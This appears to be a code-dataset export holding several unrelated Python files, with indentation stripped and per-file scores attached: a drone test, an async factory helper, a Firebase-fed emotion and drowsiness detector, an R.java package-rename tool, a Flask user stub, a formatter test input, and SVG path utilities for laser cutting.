drone = Drone(cycle([1000.0]), cycle([41.0]), region="New York", uid=uid,
longitude=cycle(np.sin(np.arange(0, 2*np.pi, np.pi/360))))
assert drone.region == "New York"
assert drone.uid == uid
msg = json.loads(drone.message())
assert len(msg) == 6
| 2.8125 | 3 |
tests/factories/base.py | korostil/invest | 0 | 12786845 | import asyncio
import inspect
import factory
class AsyncFactory(factory.Factory):
"""
Copied from
https://github.com/FactoryBoy/factory_boy/issues/679#issuecomment-673960170
"""
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
async def maker_coroutine():
for key, value in kwargs.items():
# when using SubFactory, you'll have a Task in the corresponding kwarg
# await tasks to pass model instances instead
if inspect.isawaitable(value):
kwargs[key] = await value
# replace as needed by your way of creating model instances
document = model_class(*args, **kwargs)
await document.commit()
return document
# A Task can be awaited multiple times, unlike a coroutine.
# useful when a factory and a subfactory must share a same object
return asyncio.create_task(maker_coroutine())
@classmethod
async def create_batch(cls, size, **kwargs):
return [await cls.create(**kwargs) for _ in range(size)]
class BaseFactory(factory.Factory):
class Meta:
abstract = True
| 2.984375 | 3 |
ML_Module_src/try_merge.py | Logi-Meichu/Eduction_anywhere | 0 | 12786846 | import os
import cv2
import time
import imutils
import pyrebase
import numpy as np
from utils import *
import sys
import dlib
from skimage import io
#################### Initialize ####################
print("Start initializing")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
emotion_dict = {0: "Angry", 1: "Disgusted", 2: "Fearful",
3: "Happy", 4: "Neutral", 5: "Sad", 6: "Surprised"}
firebase = init_firebase()
storage = firebase.storage()
db = firebase.database()
model, facecasc = init_model()
history_list = []
loop = 0
predictor_path = "./shape_predictor_68_face_landmarks.dat"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
reset_counter = 0
#################### Initialize ####################
print("Start looping")
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
while(1):
print("Loop ======================================================================", loop)
files = storage.list_files()
reset_counter += 1
for file in files:
if (file.name)[0] == "s" and file.name != "screenShot/":
if file.name not in history_list:
reset_counter = 0
history_list.append(file.name)
img_local_name = "imgs/" + os.path.basename(file.name) + ".png"
print(img_local_name)
storage.child(file.name).download(img_local_name)
gray_img = cv2.imread(
img_local_name, cv2.IMREAD_GRAYSCALE)
img = cv2.imread(img_local_name)
dets = detector(img, 1)
vec = np.empty([68, 2], dtype=int)
status = "Not Sleeping"
for k, d in enumerate(dets):
shape = predictor(img, d)
for b in range(68):
vec[b][0] = shape.part(b).x
vec[b][1] = shape.part(b).y
right_ear = compute_EAR(vec[42:48])
left_ear = compute_EAR(vec[36:42])
if (right_ear+left_ear)/2 < 0.2:
status = "sleeping"
print(status)
faces = facecasc.detectMultiScale(
gray_img, scaleFactor=1.3, minNeighbors=5)
for (x, y, w, h) in faces:
print("Detect Face")
roi_gray = gray_img[y:y + h, x:x + w]
cropped_img = np.expand_dims(np.expand_dims(
cv2.resize(roi_gray, (48, 48)), -1), 0)
prediction = model.predict(cropped_img)
maxindex = int(np.argmax(prediction))
if maxindex == 0 or maxindex == 1 or maxindex == 2 or maxindex == 4:
maxindex = 5
print(emotion_dict[maxindex])
if status == "sleeping":
data = {'cur_emotion': "sleeping"}
else:
data = {'cur_emotion': emotion_dict[maxindex]}
db.child("CUR_EMOTION").set(data)
if reset_counter >= 100:
reset_counter = 0
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
loop += 1
# time.sleep(1))
| 2.1875 | 2 |
client/tools/buildtool/chameleon_tool/chameleon_copyr.py | uclouddotcn/chameleon | 4 | 12786847 | <reponame>uclouddotcn/chameleon
import os, shutil, sys, codecs
def isNewerThan(a, b):
return os.path.getmtime(a) > os.path.getmtime(b)
def genRFileForPkgName(genPath, pkgName, newPkgName):
s = pkgName.split('.')
d = os.path.join(*([genPath] + s))
src = os.path.join(d, 'R.java')
targetD = os.path.join(*([genPath] + newPkgName.split('.')))
target = os.path.join(targetD, 'R.java')
if not os.path.exists(src):
error('Fail to locate old source %s' %src)
if not os.path.exists(targetD):
os.makedirs(targetD)
if not os.path.exists(target) or isNewerThan(src, target):
with codecs.open(src, 'r', 'utf8') as srcF, codecs.open(target, 'w', 'utf8') as targetF:
for l in srcF.readlines():
if l.startswith('package %s;' %pkgName):
targetF.write('package %s;\n' %newPkgName)
else:
targetF.write(l)
def main():
if len(sys.argv) < 4:
return -1
gendir = sys.argv[1]
origPkg = sys.argv[2]
nowPkg = sys.argv[3]
nowRFile = gendir + '/' + nowPkg.replace('.', '/') + '/R.java';
if not os.path.exists(nowRFile):
print >> sys.stderr, "can't find "+nowRFile
return -1
genRFileForPkgName(gendir, nowPkg, origPkg)
sys.exit(main())
| 2.265625 | 2 |
flask_mrest/SupportUser.py | cindy-zimmerman/vmb-mrest | 0 | 12786848 | import os
import base64
from flask.ext.login import UserMixin
from flask.ext.login import AnonymousUserMixin as AnonymousUser
from flask.ext.bcrypt import Bcrypt, generate_password_hash
class User(UserMixin):
# proxy for a database of users
user_database = {"JohnDoe": ("JohnDoe", "John"),
"JaneDoe": ("JaneDoe", "Jane")
}
def __init__(self, uid, username, upload_inv):
self.id = uid
self.username = username
self.upload_inv = upload_inv
@classmethod
def get(cls,id):
return cls.user_database.get(id)
class Anonymous(AnonymousUser, dict):
def __init__(self):
super(Anonymous, self).__init__()
self.username = None
def __getattribute__(self, item):
if item in ['pw', 'password']:
raise AttributeError("Anonymous users have no '%s' attribute" % item)
else:
return super(Anonymous, self).__getattribute__(item)
def hasBankRights(self):
return False
def is_authenticated(self):
return False
def is_active(self):
return True
| 2.796875 | 3 |
test/input/099.py | EliRibble/pyfmt | 0 | 12786849 | <filename>test/input/099.py
def some_really_long_function_name(i):
return i ** i
print([(
some_really_long_function_name(i),
some_really_long_function_name(i+1),
some_really_long_function_name(i+3),
) for i in range(10)])
| 2.671875 | 3 |
laser_path_utils.py | mattvalentine/LaserAssistant | 2 | 12786850 | # laser_path_utils.py
"""Utility functions for working with paths for laser cutting"""
import numpy as np
import svgpathtools.svgpathtools as SVGPT
# it's imporatant to clone and install the repo manually. The pip/pypi version is outdated
from laser_svg_utils import tree_to_tempfile
from laser_clipper import point_on_loops, point_inside_loop
def tempfile_to_paths(temp_svg):
"""open temp SVG file and return a path"""
# temp_svg.seek(0)
paths, attributes = SVGPT.svg2paths(temp_svg.name)
temp_svg.close()
return (paths, attributes)
def tree_to_paths(tree):
"""turns an svg tree into paths list"""
temp_svg = tree_to_tempfile(tree)
paths, _ = tempfile_to_paths(temp_svg)
svg_paths = []
for path in paths:
if not path:
svg_paths.append(path.d())
return svg_paths
def paths_to_loops(paths):
""""Convert a list of paths to a list of points"""
point_loop_list = []
for path_string in paths:
points = path_string_to_points(path_string)
if points is not None:
point_loop_list.append(points)
return point_loop_list
def combine_paths(paths, as_list=True):
"""combines path strings into a single string"""
combined = ""
first = True
for path in paths:
if not first:
combined += " "
combined += path
first = False
if as_list:
return [combined]
else:
return combined
def path_string_to_points(path_string):
"""Convert path string into a list of points"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return None
points = []
for segment in path:
segment_points = subpath_to_points(segment)
for point in segment_points:
if points == [] or point != points[-1]:
points.append(point)
return points
def subpath_to_points(segment):
"""Converts a path segment into a list of points"""
points = []
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
else:
points = points_from_curve(segment)
return points
def get_start(path_string):
"""returns start point (x, y) of a path string"""
path = SVGPT.parse_path(path_string)
start_xy = complex_to_xy(path.start)
return start_xy
def points_from_line(line):
"""returns endpoints of line"""
points_list = []
start = line.point(0)
end = line.point(1)
points_list.append(complex_to_xy(start))
points_list.append(complex_to_xy(end))
return points_list
def points_from_curve(curve, samples=20):
"""returns poins along a curve"""
points_list = []
for location in range(samples):
fraction = location / (samples-1)
point_on_curve = curve.point(fraction)
points_list.append(complex_to_xy(point_on_curve))
return points_list
def complex_to_xy(complex_point):
"""turns complex point (x+yj) into cartesian point [x,y]"""
xy_point = [complex_point.real, complex_point.imag]
return xy_point
def xy_to_complex(xy_point):
"""turns cartesian point [x,y] into complex point (x+yj)"""
complex_point = xy_point[0] + xy_point[1] * 1j
return complex_point
def loops_to_paths(loops):
"""turns a list of point loops into a list of path strings"""
paths = []
for loop in loops:
path = points_to_path(loop)
paths.append(path)
return paths
def points_to_path(points, closed=True):
"""turn a series of points into a path"""
first = True
data = "M "
for point in points:
if not first:
data += " L "
data += f"{point[0]},{point[1]}"
first = False
if closed:
data += " Z"
return data
def scale_path(path_string, scale):
"""scales a path string by a scale factor (float)"""
path = SVGPT.parse_path(path_string)
scaled_path = path.scaled(scale)
new_path_string = scaled_path.d()
return new_path_string
def move_path(path_string, xy_translation):
"""Takes a path string and xy_translation (x, y), and moves it x units over, and y units down"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_translation = xy_to_complex(xy_translation)
translated_path = path.translated(complex_translation)
translated_string = translated_path.d()
return translated_string
def get_angle(path_string):
"""measures the angle in degrees (CCW) from the path positive X axis (0,0), (0,1)"""
path = SVGPT.parse_path(path_string)
vector = path.point(1) - path.point(0)
angle = np.angle(vector, deg=True)
return angle
def rotate_path(path_string, angle_degrees, xy_point):
"""rotates a path string a given number of degrees (CCW) around point (x, y)"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_point = xy_to_complex(xy_point)
rotated_path = path.rotated(angle_degrees, origin=complex_point)
rotated_string = rotated_path.d()
return rotated_string
def get_length(path_string):
"""returns the length of a path string"""
path = SVGPT.parse_path(path_string)
return path.length()
def get_all_segments(loops):
"""returns all of the segments from all of the loops"""
all_segments = []
for loop in loops:
loop_segments = get_loop_segments(loop)
all_segments = all_segments + loop_segments
return all_segments
def segments_overlap(first, second):
"""returns true if segments share more than a single point"""
first_path_string = points_to_path(first, closed=False)
second_path_string = points_to_path(second, closed=False)
first_path = SVGPT.parse_path(first_path_string)[0]
second_path = SVGPT.parse_path(second_path_string)[0]
overlaps = []
for point in first:
complex_point = xy_to_complex(point)
place_on_path = second_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
for point in second:
complex_point = xy_to_complex(point)
place_on_path = first_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
overlap = len(overlaps) >= 2
return overlap
def get_loop_segments(loop):
"""returns a list of segments in a loop"""
segments = []
last_point = None
for this_point in loop:
if last_point is not None:
new_segment = [last_point, this_point]
segments.append(new_segment)
last_point = this_point
return segments
def segments_to_paths(segments):
"""converts list of segments into list of paths"""
paths = []
for segment in segments:
new_path = points_to_path(segment, closed=False)
paths.append(new_path)
return paths
def get_not_overlapping(first, second):
"""returns the segments of the first path that do not overlap with the second."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
not_overlapping = ""
segment_started = False
last_point = loop[-1]
for point in loop:
if not point_on_loops(point, second_loops):
if not segment_started:
not_overlapping += f" M {last_point[0]},{last_point[1]}"
segment_started = True
if last_point != point:
not_overlapping += f" L {point[0]},{point[1]}"
else: # close the path
if segment_started:
not_overlapping += f" L {point[0]},{point[1]}"
output_paths.append(not_overlapping)
segment_started = False
not_overlapping = ""
last_point = point
if segment_started:
output_paths.append(not_overlapping)
return output_paths
def get_overlapping(first, second):
"""returns the overlapping segments of the first and second path."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
overlapping = ""
segment_started = False
for point in loop:
if point_on_loops(point, second_loops):
if not segment_started:
overlapping += f" M {point[0]},{point[1]}"
segment_started = True
else:
overlapping += f" L {point[0]},{point[1]}"
else: # skip other points
if segment_started:
output_paths.append(overlapping)
overlapping = ""
segment_started = False
if segment_started:
output_paths.append(overlapping)
return output_paths
def divide_pathstring_parts(pathstring):
"""breaks single path string into substrings at each 'M' returning a list of path strings"""
substring = pathstring.strip()
paths = []
while 'M' in substring[1:]:
m_index = substring.find('M', 1)
if m_index > -1:
subpath = substring[0:m_index].strip()
paths.append(subpath)
substring = substring[m_index:].strip()
paths.append(substring)
return paths
# TODO: split open/closed separation into smaller chunks
def separate_closed_paths(paths):
"""takes a list of path strings
breaks non continuous paths and
joins connecting paths together
to return a list of closed paths """
discrete_paths = []
closed_paths = []
open_paths = []
dead_ends = []
for path in paths:
discrete_paths += divide_pathstring_parts(path)
for path in discrete_paths:
parsed_path = SVGPT.parse_path(path)
if parsed_path.isclosed():
closed_paths.append(path)
else:
open_paths.append(parsed_path)
while open_paths:
path = open_paths.pop()
new_path = None
for other_path in open_paths:
if path.end == other_path.start:
new_path = path.d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.end:
new_path = other_path.d() + " " + path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.end == other_path.end:
new_path = path.d() + " " + other_path.reversed().d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.start:
new_path = path.reversed().d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
if new_path is not None:
parsed_new_path = SVGPT.parse_path(new_path)
if parsed_new_path.isclosed():
closed_paths.append(new_path)
else:
open_paths.append(parsed_new_path)
else:
dead_ends.append(path.d())
open_paths = dead_ends
return closed_paths, open_paths
def is_inside(path, other_path):
"""checks if path is inside other_path and returns true or false"""
loop = paths_to_loops([path])[0]
other_loop = paths_to_loops([other_path])[0]
for point in loop:
if point_inside_loop(point, other_loop) == 1:
return True
return False
def path_to_segments(path_string):
"""breaks down a path into a list of segments"""
segments = []
path = SVGPT.parse_path(path_string)
for segment in path:
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
new_path_string = f"M {points[0][0]} {points[0][1]} L {points[1][0]} {points[1][1]}"
segments.append(new_path_string)
return segments
| 2.90625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.